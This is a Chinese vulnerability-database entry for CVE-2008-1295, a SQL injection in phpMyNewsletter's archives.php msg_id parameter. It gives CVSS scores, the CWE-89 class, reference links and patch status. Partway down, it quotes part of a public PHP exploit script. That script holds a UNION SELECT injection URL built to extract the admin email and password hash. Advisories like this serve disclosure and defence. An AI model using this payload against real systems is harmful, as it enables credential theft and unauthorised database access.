CVE-2008-1295 |
|
发布时间 :2008-03-12 13:44:00 | ||
修订时间 :2008-09-05 17:37:22 | ||||
NMCOE |
[原文]SQL injection vulnerability in archives.php in Gregory Kokanosky (aka Greg’s Place) phpMyNewsletter 0.8 beta 5 and earlier allows remote attackers to execute arbitrary SQL commands via the msg_id parameter.
[CNNVD]Gregory Kokanosky phpMyNewsletter ‘archives.php’SQL注入漏洞(CNNVD-200803-187)
Gregory Kokanosky (aka Greg's Place) phpMyNewsletter中的archives.php存在的SQL注入漏洞。远程攻击者通过msg_id参数执行任意SQL命令。
–
CVSS (基础分值)
CVSS分值: | 6.8 | [中等(MEDIUM)] |
机密性影响: | PARTIAL | [很可能造成信息泄露] |
完整性影响: | PARTIAL | [可能会导致系统文件被修改] |
可用性影响: | PARTIAL | [可能会导致性能下降或中断资源访问] |
攻击复杂度: | MEDIUM | [漏洞利用存在一定的访问条件] |
攻击向量: | NETWORK | [攻击者不需要获取内网访问权或本地访问权] |
身份认证: | NONE | [漏洞利用无需身份认证] |
–
CWE (弱点类目)
CWE-89 | [SQL命令中使用的特殊元素转义处理不恰当(SQL注入)] |
–
CPE (受影响的平台与产品)
产品及版本信息(CPE)暂不可用 |
–
OVAL (用于检测的技术细节)
未找到相关OVAL定义 |
–
官方数据库链接
–
其它链接及资源
http://www.securityfocus.com/bid/28189 (UNKNOWN) BID 28189 |
http://www.milw0rm.com/exploits/5231 (UNKNOWN) MILW0RM 5231 |
http://xforce.iss.net/xforce/xfdb/41197 (UNKNOWN) XF phpmynewsletter-archives-sql-injection(41197) |
–
漏洞信息
Gregory Kokanosky phpMyNewsletter ‘archives.php’SQL注入漏洞 | |
中危 | SQL注入 |
2008-03-12 00:00:00 | 2008-09-05 00:00:00 |
远程 | |
Gregory Kokanosky (aka Greg's Place) phpMyNewsletter中的archives.php存在的SQL注入漏洞。远程攻击者通过msg_id参数执行任意SQL命令。 |
–
公告与补丁
目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://gregory.kokanosky.free.fr/v4/phpmynewsletter/ |
–
漏洞信息 (5231)
phpMyNewsletter <= 0.8b5 (archives.php msg_id) SQL Injection Exploit (EDBID:5231) | |
php | webapps |
2008-03-10 | Verified |
0 | Charles Fol |
N/A |
[点击下载] |
#!/usr/bin/php * Date: 03-10-08 * Conditions: magic_quotes_gpc=Off * * This exploit gets admin_pass and admin_email from pmnl_config. */ print "\n"; print " PHPMyNewsletter <= 0.8b5 SQL Injection\n"; print " by real\n\n"; if($argc<2) die("usage: php phpmynewsletter_sql.php \n"); $url = $argv[1]; $c = get($url."archives.php?msg_id='%20UNION%20SELECT%201,1,admin_email,admin_pass%20%20FROM%20pmnl_config%2f%2a&list_id=1"); if(preg_match("# (.+) - 0000-00-00 00:00:00#i",$c,$a) && preg_match("#\t([a-f0-9]{32})
–
漏洞信息
43404 |
|
phpMyNewsletter archives.php msg_id Parameter SQL Injection | |
Remote / Network Access |
Information Disclosure, Input Manipulation |
Loss of Confidentiality, Loss of Integrity |
Solution Unknown |
Exploit Public | Uncoordinated Disclosure |
–
漏洞描述
–
时间线
2008-03-10 |
Unknow |
2008-03-10 | Unknow |